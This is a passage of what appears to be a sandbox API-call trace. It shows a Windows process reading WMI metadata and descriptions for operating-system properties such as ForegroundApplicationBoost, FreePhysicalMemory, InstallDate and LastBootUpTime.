plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.688] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b710*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1271990, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.688] SafeArrayGetLBound (in: psa=0x233e128b710, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.688] SafeArrayGetUBound (in: psa=0x233e128b710, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.688] lstrlenW (lpString="CIMTYPE") returned 7 [0050.688] lstrlenW (lpString="Values") returned 6 [0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.688] lstrlenW (lpString="read") returned 4 [0050.688] lstrlenW (lpString="Values") returned 6 [0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3 [0050.688] lstrlenW (lpString="write") returned 5 [0050.688] lstrlenW (lpString="Values") returned 6 [0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.688] lstrlenW (lpString="In") returned 2 [0050.688] lstrlenW (lpString="Values") returned 6 [0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.688] lstrlenW (lpString="Out") returned 3 [0050.688] lstrlenW (lpString="Values") returned 6 [0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3 [0050.688] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.689] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.689] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.689] IUnknown:Release (This=0x233e12e36f0) returned 0x1 [0050.690] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.690] SysStringLen (param_1="CodeSet") returned 0x7 [0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.690] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.690] SysStringLen (param_1="Description") returned 0xb [0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.690] SysStringLen (param_1="Distributed") returned 0xb [0050.690] SysStringLen (param_1="Distributed") returned 0xb [0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.691] IUnknown:Release (This=0x233e12d4bf0) returned 0x1 [0050.691] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.691] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128c348, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.691] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bd88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.691] GetCurrentThreadId () returned 0xdf0 [0050.691] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.691] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ForegroundApplicationBoost property indicates the increase in priority given to the foreground application. On computer systems running Windows NT 4.0 and Windows 2000, application boost is implemented by giving an application more execution time slices (quantum lengths). A ForegroundApplicationBoost value of 0 indicates the system boosts the quantum length by 6; if 1, then 12; and if 2 then 18. On Windows NT 3.51 and earlier, application boost is implemented by increasing the scheduling priority. For these systems, the scheduling priority is increased by the value of this property. The default value is 2.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.692] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.692] lstrlenA (lpString="") returned 0 [0050.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc160, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.692] SysStringLen (param_1="The ForegroundApplicationBoost property indicates the increase in priority given to the foreground application. On computer systems running Windows NT 4.0 and Windows 2000, application boost is implemented by giving an application more execution time slices (quantum lengths). A ForegroundApplicationBoost value of 0 indicates the system boosts the quantum length by 6; if 1, then 12; and if 2 then 18. On Windows NT 3.51 and earlier, application boost is implemented by increasing the scheduling priority. For these systems, the scheduling priority is increased by the value of this property. The default value is 2.") returned 0x269 [0050.692] SysStringLen (param_1="") returned 0x0 [0050.692] GetCurrentThreadId () returned 0xdf0 [0050.692] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.692] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b810*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1270ef0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.692] SafeArrayGetLBound (in: psa=0x233e128b810, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.692] SafeArrayGetUBound (in: psa=0x233e128b810, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.692] SafeArrayGetElement (in: psa=0x233e128b810, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.692] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.693] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b710*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1271830, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.693] SafeArrayGetLBound (in: psa=0x233e128b710, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.693] SafeArrayGetUBound (in: psa=0x233e128b710, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.693] lstrlenW (lpString="CIMTYPE") returned 7 [0050.693] lstrlenW (lpString="Values") returned 6 [0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.693] lstrlenW (lpString="read") returned 4 [0050.693] lstrlenW (lpString="Values") returned 6 [0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3 [0050.693] lstrlenW (lpString="write") returned 5 [0050.693] lstrlenW (lpString="Values") returned 6 [0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.693] lstrlenW (lpString="In") returned 2 [0050.693] lstrlenW (lpString="Values") returned 6 [0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.693] lstrlenW (lpString="Out") returned 3 [0050.693] lstrlenW (lpString="Values") returned 6 [0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3 [0050.693] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.693] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.693] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.694] IUnknown:Release (This=0x233e12e2ee0) returned 0x1 [0050.694] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.694] SysStringLen (param_1="CodeSet") returned 0x7 [0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.694] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.694] SysStringLen (param_1="Description") returned 0xb [0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.694] SysStringLen (param_1="Distributed") returned 0xb [0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.694] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.694] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.694] IUnknown:Release (This=0x233e12d4690) returned 0x1 [0050.694] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.694] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f088, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.695] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f0d8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.695] GetCurrentThreadId () returned 0xdf0 [0050.695] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.695] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of kilobytes of physical memory currently unused and available", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.695] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.695] lstrlenA (lpString="") returned 0 [0050.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.695] SysStringLen (param_1="Number of kilobytes of physical memory currently unused and available") returned 0x45 [0050.695] SysStringLen (param_1="") returned 0x0 [0050.695] GetCurrentThreadId () returned 0xdf0 [0050.695] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.695] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.695] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.696] SysStringLen (param_1="CodeSet") returned 0x7 [0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.696] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.696] SysStringLen (param_1="Description") returned 0xb [0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.696] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.696] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.696] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.696] IUnknown:Release (This=0x233e12d4940) returned 0x1 [0050.698] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.698] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bd88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.698] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f088, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.698] GetCurrentThreadId () returned 0xdf0 [0050.698] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.698] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The total number of kilobytes that can be mapped into the operating system's paging files without causing any other pages to be swapped out.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.699] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.699] lstrlenA (lpString="") returned 0 [0050.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.699] SysStringLen (param_1="The total number of kilobytes that can be mapped into the operating system's paging files without causing any other pages to be swapped out.") returned 0x8c [0050.699] SysStringLen (param_1="") returned 0x0 [0050.699] GetCurrentThreadId () returned 0xdf0 [0050.699] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.699] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.699] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.699] SysStringLen (param_1="CodeSet") returned 0x7 [0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.699] SysStringLen (param_1="Description") returned 0xb [0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.699] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.699] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a [0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.699] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.699] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.700] IUnknown:Release (This=0x233e12d4ea0) returned 0x1 [0050.700] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.700] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f178, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.700] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f1c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.700] GetCurrentThreadId () returned 0xdf0 [0050.700] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.700] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of kilobytes of virtual memory currently unused and available. For example, this may be calculated by adding the amount of free RAM to the amount of free paging space (i.e., adding the properties, FreePhysicalMemory and FreeSpaceInPagingFiles).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.701] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.701] lstrlenA (lpString="") returned 0 [0050.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.701] SysStringLen (param_1="Number of kilobytes of virtual memory currently unused and available. For example, this may be calculated by adding the amount of free RAM to the amount of free paging space (i.e., adding the properties, FreePhysicalMemory and FreeSpaceInPagingFiles).") returned 0xfb [0050.701] SysStringLen (param_1="") returned 0x0 [0050.701] GetCurrentThreadId () returned 0xdf0 [0050.701] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.701] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.701] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.701] SysStringLen (param_1="CodeSet") returned 0x7 [0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.701] SysStringLen (param_1="Description") returned 0xb [0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.701] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.701] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.701] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.701] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.702] IUnknown:Release (This=0x233e12d5150) returned 0x1 [0050.702] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.702] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f178, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.702] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f1c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.702] GetCurrentThreadId () returned 0xdf0 [0050.702] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.702] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The InstallDate property is datetime value indicating when the object was installed. A lack of a value does not indicate that the object is not installed.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.702] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.703] lstrlenA (lpString="") returned 0 [0050.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.703] SysStringLen (param_1="The InstallDate property is datetime value indicating when the object was installed. A lack of a value does not indicate that the object is not installed.") returned 0x9a [0050.703] SysStringLen (param_1="") returned 0x0 [0050.703] GetCurrentThreadId () returned 0xdf0 [0050.703] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.703] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.703] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.703] SysStringLen (param_1="CodeSet") returned 0x7 [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.703] SysStringLen (param_1="Description") returned 0xb [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.703] SysStringLen (param_1="EncryptionLevel") returned 0xf [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.703] SysStringLen (param_1="FreePhysicalMemory") returned 0x12 [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.703] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16 [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.703] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.703] SysStringLen (param_1="FreeVirtualMemory") returned 0x11 [0050.703] SysStringLen (param_1="InstallDate") returned 0xb [0050.704] IUnknown:Release (This=0x233e12d56b0) returned 0x1 [0050.704] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.704] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea958, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.704] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea628, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.704] GetCurrentThreadId () returned 0xdf0 [0050.704] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.704] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Time when the operating system was last booted", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.704] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.704] lstrlenA (lpString="") returned 0 [0050.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.705] SysStringLen (param_1="Time when the operating system was last booted") returned 0x2e [0050.705] SysStringLen (param_1="") returned 0x0 [0050.705] GetCurrentThreadId () returned 0xdf0 [0050.705] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.705] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 